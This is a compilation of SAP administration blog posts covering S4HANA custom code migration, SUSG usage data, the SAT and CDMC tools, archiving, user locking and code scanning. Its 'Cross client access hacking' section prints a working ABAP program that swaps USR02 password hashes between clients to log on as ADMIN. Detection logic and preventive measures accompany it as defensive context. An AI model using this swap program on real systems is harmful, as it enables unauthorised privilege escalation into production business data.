S4HANA blacklist

With S4HANA SAP has deprecated some parts of their old code. In some weird cases this old code might still be required.

This blog explains the S4HANA blacklist. Questions that will be answered are:

  • How do I see that a dump is caused by the S4HANA blacklist?
  • Where to find more background information on the S4HANA blacklist?

The S4HANA blacklist dump

If for whatever reason the S4HANA system gives an ABAP dump with the error SYSTEM_ABAP_ACCESS_DENIED, this is an S4HANA blacklist dump. See note 2476734 – Runtime error SYSTEM_ABAP_ACCESS_DENIED.

What to do when you hit a blacklisted item?

The best approach is to avoid doing what you did and look for the functional alternative provided by SAP. Search for the correct simplification item OSS note. In almost all cases SAP provides a solution.

Activating a blacklisted item

OSS note 2249880 – Dump SYSTEM_ABAP_ACCESS_DENIED caused through Blacklist Monitor in SAP S/4HANA on premise, contains the procedure to activate a blacklisted item.

Please make sure you have clearance from both SAP and the system owner in writing before executing this procedure. Support can be lost, and future system upgrades can face severe blocks. Only execute this as a last resort after explicit approval.

Include usage data in S4HANA custom code migration FIORI app

With the new S4HANA custom code migration FIORI app you can include system usage data (from productive system) to see which code blocks are used and which ones are not.

This blog will give answers to the following questions:

  • How to collect usage data from productive system?
  • How to include the usage data in the S4HANA custom code migration FIORI app?

This blog assumes you have already set up the S4HANA custom code migration FIORI app. If you have not done this, follow the instructions in this blog.

Collecting usage data in production with transaction SUSG

General recommendations for the use of transaction SUSG can be found in OSS note 2701371 – Recommendations for aggregating usage data using transaction SUSG.

In your productive system start transaction SUSG and activate the usage data aggregation:

If you don’t have sufficient authorizations, you might get this weird screen:

If you see this screen, first check your user authorizations.

SUSG installation

If SUSG does not start in your productive system it needs to be installed first. To install SUSG apply OSS note 2643357 – Installation of Transaction SUSG. This is a TCI based OSS note (see blog).

After the TCI note also apply these OSS notes:

Creating the snapshot

Now that the data collection and aggregation is activated, you will need to be patient. Let the system collect the data for the next few days. Then go to transaction SUSG and check in the log that the aggregation went fine:

Now you can create a snapshot in the Manage Snapshots section:

Create the snapshot and download it to a file on your desktop or laptop. If wanted, you can set up an RFC connection as well.

The security and basis teams normally do not like any RFC going from a production system to a non-production system. So the file option is normally the best way.

Loading the data into your upgraded S4HANA system

In the S4HANA system where your custom code analysis runs, start transaction SUSG and make sure it is active. Now you can upload the snapshot from the productive server that you downloaded in the previous step.

Please make sure that the OSS notes on both your productive system and your S4HANA system are identical. The notes contain changes to the file format of the download file. If the notes are not applied identically, you will have file format issues during upload. The recommendation is to apply all recent SUSG notes to both your productive server and the S4HANA system.

S4HANA custom code migration app with usage data

Now you can finally launch the S4HANA custom code migration app. Create a new analysis. In the usage data part of the app, you can assign the snapshot you have uploaded in the previous section:

Now start the custom code analysis and let it run.

The end results of code being used or not can be seen in the column Usage Information in the Analyze Findings section:

Background information

More background on SUSG setup can be found on this blog.

Activating and using the S4HANA custom code migration FIORI app

This blog explains the S4HANA custom code migration FIORI app. Questions that will be answered in this blog are:

  • How to set up the S4HANA custom code migration app?
  • How to run the S4HANA custom code migration app?
  • What do the results of the S4HANA custom code app look like?

Activation of the S4HANA custom code migration FIORI app

The custom code app official specification can be found on the FIORI reference library.

First make sure the basis setup of embedded FIORI in general is done on your S4HANA system. See this blog for background.

And make sure the ATC settings for S4HANA code migration are done. See this blog for background.

Next step: in transaction PFCG create a new role (for example Z_CUSTOM_CODE_APP). Add catalog SAP_BASIS_TCR_T as a launchpad catalog:

Save and activate the role. Assign the users to the role.

In transaction /IWFND/MAINT_SERVICE add the following services (and activate them):

| Component | External Technical Name |
| --- | --- |
| Custom code migration projects | SYCM_APS_C_PROJECT_CDS |
| Analysis of SAP S/4HANA custom code check findings | SYCM_APS_C_ATC_FIND_ALP_CDS |
| Custom code scoping by request entry points | SYCM_APS_C_SCP_BY_EP_CDS |
| Custom code scoping by packages | SYCM_APS_C_SCP_BY_PK_CDS |

In transaction SICF activate the following nodes:

NW_APS_CCM_PRJ

NW_APS_EXT_LIB

NW_APS_LIB

The core activation actions are now done.

Start transaction /UI2/FLP to start the FIORI launchpad. You will not find the tile. Change the homepage and add the following tile from the catalog:

Before starting, also make sure that the RFC object providers are set up in the ATC setup:

You can name the ID, description and group ID the same if you want. Make sure to use RFC destination none.

Creating a project in the app

Now you can start creating a project in the app. Click on the + symbol to add a project.

In the destination, fill out the system you have put into the ATC object provider configuration. Then save the project and let it run. In the background the full ATC check is now carried out. This can take some time. You can refresh the project to see the status:

Analyzing the results

When the run is done, you can now analyze the results on the Analysis tab:

Important here is that you have to press the Analyze Findings button to go into the detailed analysis overview:

On the top are the graphical overviews. In the bottom is the detailed list:

You can use the download to excel button for further processing.

During the custom code clean up you can redo the same project, by rerunning the analysis. Or you can decide to run a new project.

Including usage data from productive system

You can also add actual usage data from a productive system in the custom code management app. See this blog.

Known issues and bug fixes

For UI bugs check OSS note 2809550 – Custom Code Migration App – Correction bundle for S/4HANA 1909.

Setting up S4HANA custom code adjustments

You have just upgraded to S4HANA in your sandbox or development system. SPAU and SPAU_ENH processing are done. Next step is the S4HANA custom code adjustments.

Questions that will be answered in this blog are:

  • How to import the SCI variants for S4HANA custom code adjustments?
  • How to import the latest simplification database into your system?
  • How to

Importing the SCI variants

Go to transaction SCI and select the option Utilities and then Import Check Variants. This action will import the required variants. Check that the variants are now present.

In the SCI variant, you can leave everything as delivered out-of-the-box with the exception of the material length option. If the business keeps the material field length at 18 (which most customers do), you need to change the variable from 40 to 18.

Setting up the simplification database

Follow the instructions of OSS note 2241080 – SAP S/4HANA: Content for checking customer specific code, to download the latest content for the simplification database.

Use transaction SYCM to upload the file. Select option Simplification Database and then Import from ZIP File.

Running the ATC tool

Now you can start to set up the ATC tool. For details see this blog.

The ATC variant to run should look like this:

Important here:

  • Select the desired S4HANA readiness check SCI variant
  • Set the package to Z* to select your custom code
  • Tick the box for Calculate quick fix proposals

Now you can start the ATC run:

Set the results to Active to see all the results in Eclipse as well. Depending on your system size, lower the default number of processes from 10 to, for example, 5.

If you run into ATC tool issues for the S4HANA custom code adjustments run: first increase memory parameter rsdb/obj/buffersize in RZ11 to at least 150 MB. Then run again.

Processing the results

The ATC tool will now give a lot of results:

The results from the ATC tool can be distributed to more members by changing the Contact Person. To do this select one or more findings and right click on the Contact Person column, and select the option Change Contact Person.

The basic order of processing the results:

  1. Check simplification OSS note
  2. Fix code
  3. Apply relevant pragma (directly or in Eclipse via quick fix)
  4. Apply exemption

For the exemptions: you can raise them, but a different person needs to approve them.

When you are using Eclipse, you might run into issues with exemption requests. See OSS note 2815887 - ATC: No Possibility to Request Exemptions in Eclipse for the fix.

Statistics from the ATC runs

If you run the ATC tool weekly, you can use it to track the progress. In the ATC results screen there is a specific button Statistics View:

Default sorting is by type of issue to be solved:

This view can also be sorted on Contact Person. This will enable you to check the progress of each developer with his or her work list.

Using quick fixes with Eclipse

Using quick fixes with Eclipse is a fast way of going through the list. The Eclipse list is based on Contact Person and active results. So you only see in Eclipse the results for your user account.

In Eclipse first select the appropriate views:

Now you can start processing. You will get online help and you can apply the proposed quick fix automatically instead of keying it in by hand.

You might run into an initial bug with a dump, which is solved by applying OSS note 2647710 - Simple transformation: Inconsistent ST loads. 

The quick fixes are updated with both bugs and new functions. Please check out the new versions of the following OSS notes:

Nice blog on the quick fixes: follow this link.

To enable ABAP backend for Eclipse: follow this link.

Using the S4HANA custom code migration app

You can also use the S4HANA custom code migration app. After completing the setup above and activating the S4HANA embedded FIORI (see this blog), follow the steps in this blog for the setup.

Further background information

More information can be found:

SAT ABAP runtime analysis

The SAT ABAP runtime analysis tool can be used to identify performance problems in ABAP programs.

Questions that will be answered in this blog are:

  • How to run the SAT tool?
  • How to read the results of the SAT tool?

Starting the SAT tool

The SAT ABAP runtime analysis tool can be started with transaction SAT:

At the top left there is a Tips & Tricks button. This will bring you to the following tool:

Here you can compare the optimal and not optimal way of coding. By hitting measure runtime button you can actually compare in real time the difference between the 2 methods.

The performance issue program

To test the tool, we first write a simple test program:

REPORT zperftest2.

DATA: zlt_vbak TYPE TABLE OF vbak.
DATA: zls_vbak TYPE vbak.
DATA: zlt_vbap TYPE TABLE OF vbap.
DATA: zls_vbap TYPE vbap.
DATA: zls_vbap2 TYPE vbap.

SELECT * FROM vbak INTO TABLE zlt_vbak UP TO 100 ROWS.

LOOP AT zlt_vbak INTO zls_vbak.
  SELECT * FROM vbap INTO zls_vbap.
    DO 10000 TIMES.
      zls_vbap2 = zls_vbap.
    ENDDO.
  ENDSELECT.
ENDLOOP.

Now we start the SAT tool and enter the program name. Make sure the tick box Evaluate Immediately is on and press Execute.

Now the measurement will start.

Result of the trace tool

The result of the trace tool is as follows:

On the left side you see the split in where the program spends its time. Here you can see that most of the time is spent on internal processing and not on SQL statements. SQL statements can be analyzed from the SAT tool or from the ST05 SQL trace tool.

By double-clicking on the internal access, the right-hand side of the screen is filled. Here you can see in which code blocks the most net and gross time is spent. It does not always point you to the exact statements that are not ok, but it can point you to the program that is causing the biggest delay.

In our case the DO 10000 TIMES loop is the performance killer. With only SQL tracing this cannot be found.

Relevant OSS notes

Check and if needed you can apply these OSS notes to solve bugs in the SAT tool:

2737535 – Slow listing of traces in SAT (ABAP Runtime Analysis)

2779153 – Export/Import not working for large ABAP traces in SAT

2825334 – Remove user specific time reference in transaction SAT (use of SY-ZONLO)

2838533 – Runtime Error in SAT during trace analysis (CL_ATRA_EXPAND)

Analyzing code before upgrade or support package: CDMC toolset

This blog explains the use of the CDMC toolset, which you can run to analyze your custom code before starting an upgrade or support package.

CDMC toolset

Start transaction CNV_CDMC to go to the CDMC overview.

Go to ad hoc analysis:

CNV_CDMC start screen

Start SAP modification run

Determine SAP modifications run

Wait for run to finish. If done, click the Display Results.

Run ready

View results:

Run results

Drawback of the modification overview: OSS notes are also marked as modifications.

Other useful runs: Syntax check and Inactive customer objects.

If you run these checks before an upgrade you can save quite some annoying issues during the upgrade itself.

OSS notes

Relevant OSS notes:

2772644 – ST-PI/CDMC: Clearing analysis alv error

SAP database growth control: data archiving business discussions

This blog addresses the main challenge in SAP data archiving for functional objects: the discussions with the business.

This blog will give answers to the following questions:

  • When to start data archiving discussion with the business?
  • How to come to good retention periods?
  • What are arguments for not archiving certain data?

Data archiving discussion with the business

Unlike technical data deletion, functional data archiving cannot be done without proper business discussion and approval.

Depending on your business several aspects for data are important:

  • Auditing and Sox needs
  • Tax and legal retention periods
  • Product data requirement
  • And so on…..

Here are some rules of thumb you can use before considering to start up the business discussions about archiving:

Rule of thumb 1: the system is pretty new. Wait at least 3 years to get an insight into which tables are growing fast and are worth investigating for data archiving.
Rule of thumb 2: if your system is growing slowly, but the infrastructure capabilities grow faster: only perform technical clean up and don't even start functional data archiving.
Rule of thumb 3: if you are on HANA: check if the data aging concept for functional objects is stable enough and without bugs. Data aging does not require much work, it is only technical and it does not require much business discussion. Data retrieval from the end user perspective is transparent.

Data analysis before starting the discussion

If your system is growing fast and/or you are getting performance complaints, then you need to do proper data analysis before starting any business discussion.

Start with proper analysis on the data. Use the TAANA tool to get insights into the data: how is the distribution of data per document type, per year, per plant/company code etc. If you want to propose retention period of let’s say 5 years, you can use the TAANA results to show what percentage of data you can move out of the database.

Secondly: if you have an idea on which data you want to archive, first execute a trial run on a recent production copy. There might be functional blocks that prevent you from archiving data (like not closed documents).

The third important factor is the ease of data retrieval. Some objects have a nice simple data retrieval function, and some are really terrible. If the retrieval is good, the business will more easily accept a shorter retention period.

As the last step you can start the business case: how much data will be saved (and hence how much money will be saved) and how much performance would be gained. And how much time needs to be invested for setting up, checking (testing!) and running the data archiving runs.

In practice a data archiving business case is only present in very large systems of 5 TB and larger. This sizing tipping point changes over time as hardware gets cheaper and hourly manpower costs go up.

The discussion itself

Take much time in planning for the discussion itself. It is not uncommon that archiving discussions take over a year to complete. The better you are prepared, the easier the discussion. It also helps to have a few real performance pain points that get solved via data archiving. There is normally a business owner for such a pain point who can help push data archiving.

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (the easiest is standard users: see blog on this topic). Some basis and security people will wave this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored in a different client”.

So what the hacker will do is simply open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the hacked source client a new user will be created. Let’s say the user ADMIN, which also exists in the target client. The hacker creates the user and sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t, read this blog on how to do it and execute it!)
  • ADMIN access from the same terminal as the hacker is using to log on to the source client
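
Each trace above is weak on its own; correlated per terminal they form a recognisable chain. The following added example (not part of the original blog) does that correlation over a constructed log export. The pipe-delimited record layout, the event kind names, and the user and terminal names are assumptions that you need to map to your own audit log export.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Hypothetical event kinds; map them to the messages your audit log export contains.
CLIENT_CHANGE, REPORT_START, LOGON_OK = (
    "CLIENT_SETTINGS_CHANGED", "REPORT_STARTED", "LOGON_OK")

@dataclass(frozen=True)
class Event:
    ts: datetime
    client: str
    user: str
    terminal: str
    kind: str
    detail: str

# Constructed sample export: timestamp|client|user|terminal|kind|detail
SAMPLE_LOG = """\
2024-03-01T09:00:05|100|DEV_ANNA|WS-DEV7|REPORT_STARTED|ZSALES_LIST
2024-03-01T09:01:10|100|DEV_ANNA|WS-DEV7|LOGON_OK|
2024-03-01T10:02:11|066|MAINT_USER|WS-4711|LOGON_OK|
2024-03-01T10:03:40|066|MAINT_USER|WS-4711|CLIENT_SETTINGS_CHANGED|066
2024-03-01T10:09:02|066|MAINT_USER|WS-4711|REPORT_STARTED|ZSWAPUSER
2024-03-01T10:10:30|100|ADMIN|WS-4711|LOGON_OK|
2024-03-01T10:41:15|066|MAINT_USER|WS-4711|REPORT_STARTED|ZSWAPUSER
2024-03-01T10:42:00|066|MAINT_USER|WS-4711|CLIENT_SETTINGS_CHANGED|066
2024-03-01T11:00:00|100|BASIS_BOB|WS-ADM2|CLIENT_SETTINGS_CHANGED|100
2024-03-01T11:05:00|100|BASIS_BOB|WS-ADM2|REPORT_STARTED|RSUSR200
"""

def parse_log(text):
    """Turn the pipe-delimited export into Event objects, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, user, terminal, kind, detail = line.strip().split("|")
        events.append(Event(datetime.fromisoformat(ts), client, user,
                            terminal, kind, detail))
    return events

def find_cross_client_chains(events, window=timedelta(hours=2)):
    """Flag terminals where a client settings change and a custom (Z*/Y*) report
    start in one client are followed by a logon to a different client."""
    per_terminal = {}
    for ev in sorted(events, key=lambda e: e.ts):
        per_terminal.setdefault(ev.terminal, []).append(ev)
    findings, seen = [], set()
    for terminal, evs in per_terminal.items():
        for i, change in enumerate(evs):
            if change.kind != CLIENT_CHANGE:
                continue
            # Only events on the same terminal shortly after the settings change
            later = [e for e in evs[i + 1:] if e.ts - change.ts <= window]
            report = next((e for e in later
                           if e.kind == REPORT_START and e.client == change.client
                           and e.detail[:1].upper() in ("Z", "Y")), None)
            if report is None:
                continue
            for logon in later:
                if (logon.kind == LOGON_OK and logon.client != change.client
                        and logon.ts >= report.ts and logon not in seen):
                    seen.add(logon)
                    findings.append({
                        "terminal": terminal,
                        "source_client": change.client,
                        "report": report.detail,
                        "target_client": logon.client,
                        "target_user": logon.user,
                        "logon_time": logon.ts,
                    })
    return findings

if __name__ == "__main__":
    for finding in find_cross_client_chains(parse_log(SAMPLE_LOG)):
        print(finding)
```

The developer on WS-DEV7 and the basis admin on WS-ADM2 are not flagged, because neither combines all three traces on one terminal.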

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)

Mass locking and end validity date of users

There are 2 good reasons for mass locking and ending the validity date of users: security and licenses.

Questions that will be answered in this blog are:

  • How can I mass lock users automatically if they have not logged on for a certain time?
  • How can I mass set the validity date of the users that did not log on for a certain time?

Automatic lock of user after expired logon

In RZ11 you can set parameter login/password_max_idle_productive with an amount in days.

Password max idle initial

If a user (including yourself) has not logged on to the system for this number of days, the password is still valid, but it can no longer be used to log on.

If the user tries to logon after the period he will see this error message and cannot continue:

Password deactivated

In SU01 such a user looks like this:

Password expired

If you also want to automatically lock users after you give them a new password, use the parameter login/password_max_idle_initial.

Initial passwords are one of the common ways for a hacker to enter a system, especially if the initial password used by the admin is more or less the same (like Welcome_1234!). Countermeasure: instruct your admins to use the Password Generator. This will generate a long, random one-off password.

Mass setting of user validity date

For user measurement and security reasons you want to limit the validity period as well. Users who are locked still count for user measurement (see blog on license measurement tips & tricks). Users that are locked and then unlocked by some method can be a security threat.

Standard SAP program RSUSR_LOCK_USERS (built on top of program RSUSR200) is the tool to achieve this.

It has quite a long selection screen:

RSUSR_LOCK_USERS screen 1

On the first block set the dates for last logon and password change to get a good selection of users.

RSUSR_LOCK_USERS screen 2

On the second block it is very important to select only Dialog Users.

First run with Test Selection to get a list. If you are happy with the list, run it with Set End Of Validity Period.

Performance and bug notes (OSS search hints RSUSR200 and RSUSR_LOCK_USERS): 
2615606 - SUIM | Search for users with incorrect logon does not work
2628060 - SUIM | RSUSR200: Poor performance
2698638 - RSUSR_LOCK_USERS does not unlock users with incorrect logon attempts.
2715833 - SUIM | RSUSR200 - search for users not valid in certain time period returns incorrect results
2770656 - RSUSR_LOCK_USERS: Incorrect selection parameters

Scanning ABAP code: ABAP search tool

This blog will explain how to scan ABAP coding in search of a specific keyword or string. Older or badly written programs often contain hard-coded logic like system IDs, plant codes, movement types, order types etc. When a larger business change happens, you need to find these codes in your ABAP code and act on them. This blog will explain how to do this search.

Questions that will be answered are:

  • How does the scan program work?
  • How to search for certain strings?
  • How to search for words in the comments?

ABAP search tool

You can start the ABAP search tool with transaction CODE_SCANNER:

Search start screen

For testing 2 simple programs are written:

REPORT zscantest1.

* Behaviour depends on a hard-coded system ID
IF syst-sysid EQ 'S4H'.
  WRITE 'development system'.
ELSEIF syst-sysid EQ 'S4P'.
  WRITE 'production system'.
ENDIF.

REPORT zscantest2.

DATA zt001w TYPE t001w.

* Read one plant into the WERKS component of the work area
SELECT SINGLE werks FROM t001w INTO zt001w-werks.

IF zt001w-werks EQ 'DE01'.
  WRITE 'German plant'.
ELSEIF zt001w-werks EQ 'US01'.
* USA plant
  WRITE 'US plant'.
ELSE.
  WRITE 'different plant'.
ENDIF.

If we now start a search with the word ‘S4H’ we get this result:

Result search 1

A hard coded SID.

If we search with ‘US01’ we get this result:

Result search 2

A hard coded plant.

If we search with ‘USA’ we get this result:

Result search 3

The word we were looking for is in the comment lines.
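
The same kind of search can be run offline on exported source files. This added example (not code from the original blog, and not how CODE_SCANNER is implemented) scans shortened copies of the two test programs and reports whether each hit sits in a literal, in code or in a comment; the function and class names are illustrative.

```python
from typing import NamedTuple

# Constructed input: shortened copies of the two test programs, keyed by name.
SOURCES = {
    "ZSCANTEST1": """REPORT zscantest1.

IF syst-sysid EQ 'S4H'.
  WRITE 'development system'.
ELSEIF syst-sysid EQ 'S4P'.
  WRITE 'production system'.
ENDIF.
""",
    "ZSCANTEST2": """REPORT zscantest2.

DATA zt001w TYPE t001w.

IF zt001w-werks EQ 'DE01'.
  WRITE 'German plant'.
ELSEIF zt001w-werks EQ 'US01'.
* USA plant
  WRITE 'US plant'.
ENDIF.
""",
}

class Hit(NamedTuple):
    program: str
    line_no: int
    where: str  # "literal", "code" or "comment"
    text: str

def split_line(line):
    """Split one ABAP line into (code without literals, literals, comment)."""
    if line.startswith("*"):  # '*' in column 1 marks a full-line comment
        return "", [], line[1:]
    code, literals, i = [], [], 0
    while i < len(line):
        ch = line[i]
        if ch == '"':  # a double quote outside a literal starts an inline comment
            return "".join(code), literals, line[i + 1:]
        if ch in "'`":  # text literal; a doubled quote inside it is an escape
            buf, j = [], i + 1
            while j < len(line):
                if line[j] == ch:
                    if line[j + 1:j + 2] != ch:
                        break  # closing quote
                    j += 1  # skip the first quote of the escaped pair
                buf.append(line[j])
                j += 1
            literals.append("".join(buf))
            i = j + 1
            continue
        code.append(ch)
        i += 1
    return "".join(code), literals, ""

def scan(sources, term):
    """Case-insensitive search; each hit is classified as literal, code or comment."""
    needle, hits = term.lower(), []
    for program, source in sources.items():
        for no, line in enumerate(source.splitlines(), start=1):
            code, literals, comment = split_line(line)
            parts = (("literal", "\n".join(literals)), ("code", code),
                     ("comment", comment))
            for where, text in parts:
                if needle in text.lower():
                    hits.append(Hit(program, no, where, line.strip()))
    return hits

if __name__ == "__main__":
    for term in ("S4H", "US01", "USA"):
        for hit in scan(SOURCES, term):
            print(term, hit)
```

Separating literal hits from comment hits helps when triaging: a hard-coded value in a literal changes program behaviour, while a comment hit does not.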

Search alternative program RS_ABAP_SOURCE_SCAN

In SAP note 2764076 – CODE_SCANNER not working properly, SAP explains that CODE_SCANNER might not always work for every release. They offer alternative program RS_ABAP_SOURCE_SCAN (there is no transaction code for this program, so start via SE38):

RS_ABAP_SOURCE_SCAN